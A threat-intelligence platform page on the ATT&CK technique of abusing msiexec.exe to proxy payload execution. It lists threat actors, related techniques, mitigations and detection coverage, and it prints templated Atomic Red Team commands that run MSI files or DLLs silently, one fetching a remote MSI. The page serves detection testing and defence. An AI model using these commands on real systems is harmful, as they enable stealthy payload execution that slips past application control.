Home/ATT&CK Technique/Msiexec
ATT&CK Technique

Msiexec

T1218.007 · stealth

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi). The Msiexec.exe binary may also be digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs. Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.

Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.

Windows

Actors Using This

13
latin_america_brazilian_organized_cybercrimeAmavaldo
indiaBitter
chinaDark Pink
indiaDoNot Team
russia_speaking_cybercrimeFIN7
latin_america_brazilian_organized_cybercrimeJavali
latin_america_brazilian_organized_cybercrimeMekotio
latin_america_brazilian_organized_cybercrimeMelcoz
latin_america_brazilian_organized_cybercrimeMispadu / URSA
latin_america_brazilian_organized_cybercrimeNumando
latin_america_brazilian_organized_cybercrimeOusaban
pakistanSideCopy
russia_speaking_organized_cybercrimeTA505

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
privilege-escalation same
T1055.012 · Process Hollowing ×6.87
discovery same
T1426 · System Information Discovery ×7.85T1614.001 · System Language Discovery ×7.32T1422 · System Network Configuration Discovery ×6.10
collection same
T1056.002 · GUI Input Capture ×8.01T1417 · Input Capture ×6.87T1185 · Browser Session Hijacking ×6.10T1409 · Stored Application Data ×4.99T1430.001 · Remote Device Management Services ×4.99T1429 · Audio Capture ×4.22
command-and-control same
T1437 · Application Layer Protocol ×7.85T1437.001 · Web Protocols ×7.85
impact same
T1499 · Endpoint Denial of Service ×4.00
other same
T1036.001 · Invalid Code Signature ×3.49T1564.003 · Hidden Window ×3.14

Atomic Tests

11
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
command_promptwindowsMsiexec.exe - Execute Local MSI file with embedded JScript
Executes an MSI containing embedded JScript code using msiexec.exe 
#{msi_exe} /q /#{action} "#{msi_payload}"
command_promptwindowsMsiexec.exe - Execute Local MSI file with embedded VBScript
Executes an MSI containing embedded VBScript code using msiexec.exe 
#{msi_exe} /q /#{action} "#{msi_payload}"
command_promptwindowsMsiexec.exe - Execute Local MSI file with an embedded DLL
Executes an MSI containing an embedded DLL using msiexec.exe 
#{msi_exe} /q /#{action} "#{msi_payload}"
command_promptwindowsMsiexec.exe - Execute Local MSI file with an embedded EXE
Executes an MSI containing an embedded EXE using msiexec.exe 
#{msi_exe} /q /#{action} "#{msi_payload}"
powershellwindowsWMI Win32_Product Class - Execute Local MSI file with embedded JScript
Executes an MSI containing embedded JScript code using the WMI Win32_Product class 
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
powershellwindowsWMI Win32_Product Class - Execute Local MSI file with embedded VBScript
Executes an MSI containing embedded VBScript code using the WMI Win32_Product class 
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
powershellwindowsWMI Win32_Product Class - Execute Local MSI file with an embedded DLL
Executes an MSI containing an embedded DLL using the WMI Win32_Product class 
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
powershellwindowsWMI Win32_Product Class - Execute Local MSI file with an embedded EXE
Executes an MSI containing an embedded EXE using the WMI Win32_Product class 
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
command_promptwindowsMsiexec.exe - Execute the DllRegisterServer function of a DLL
Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS. 
#{msi_exe} /y "#{dll_payload}"
command_promptwindowsMsiexec.exe - Execute the DllUnregisterServer function of a DLL
Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS. 
#{msi_exe} /z "#{dll_payload}"
command_promptwindowsMsiexec.exe - Execute Remote MSI file
Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe. 
#{msi_exe} /q /i "#{msi_payload}"

Mitigations

2
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1026Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.

Account Permissions and Roles
  • Implement RBAC and least privilege principles to allocate permissions securely.
  • Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security
  • Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
  • Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA)
  • Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM)
  • Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring
  • Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access
  • Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
Tools for Implementation Privileged Access Management (PAM)
  • CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management
  • Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication
  • Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management
  • sudo configuration, SELinux, AppArmor.
Just-In-Time Access
  • Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.
M1042Disable or Remove Feature or Program

Disable or remove unnecessary and potentially vulnerable software, features, or services to reduce the attack surface and prevent abuse by adversaries. This involves identifying software or features that are no longer needed or that could be exploited and ensuring they are either removed or properly disabled.

Remove Legacy Software
  • Use Case: Disable or remove older versions of software that no longer receive updates or security patches (e.g., legacy Java, Adobe Flash).
  • Implementation: A company removes Flash Player from all employee systems after it has reached its end-of-life date.
Disable Unused Features
  • Use Case: Turn off unnecessary operating system features like SMBv1, Telnet, or RDP if they are not required.
  • Implementation: Disable SMBv1 in a Windows environment to mitigate vulnerabilities like EternalBlue.
Control Applications Installed by Users
  • Use Case: Prevent users from installing unauthorized software via group policies or other management tools.
  • Implementation: Block user installations of unauthorized file-sharing applications (e.g., BitTorrent clients) in an enterprise environment.
Remove Unnecessary Services
  • Use Case: Identify and disable unnecessary default services running on endpoints, servers, or network devices.
  • Implementation: Disable unused administrative shares (e.g., C$, ADMIN$) on workstations.
Restrict Add-ons and Plugins
  • Use Case: Remove or disable browser plugins and add-ons that are not needed for business purposes.
  • Implementation: Disable Java and ActiveX plugins in web browsers to prevent drive-by attacks.

Detection Coverage

1/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 9
Analytics (MITRE CAR) none
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

Comply & Defend

NIST 800-53AC-02, AC-03, AC-05, AC-06, CM-02, CM-05, CM-06, CM-07, IA-02
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin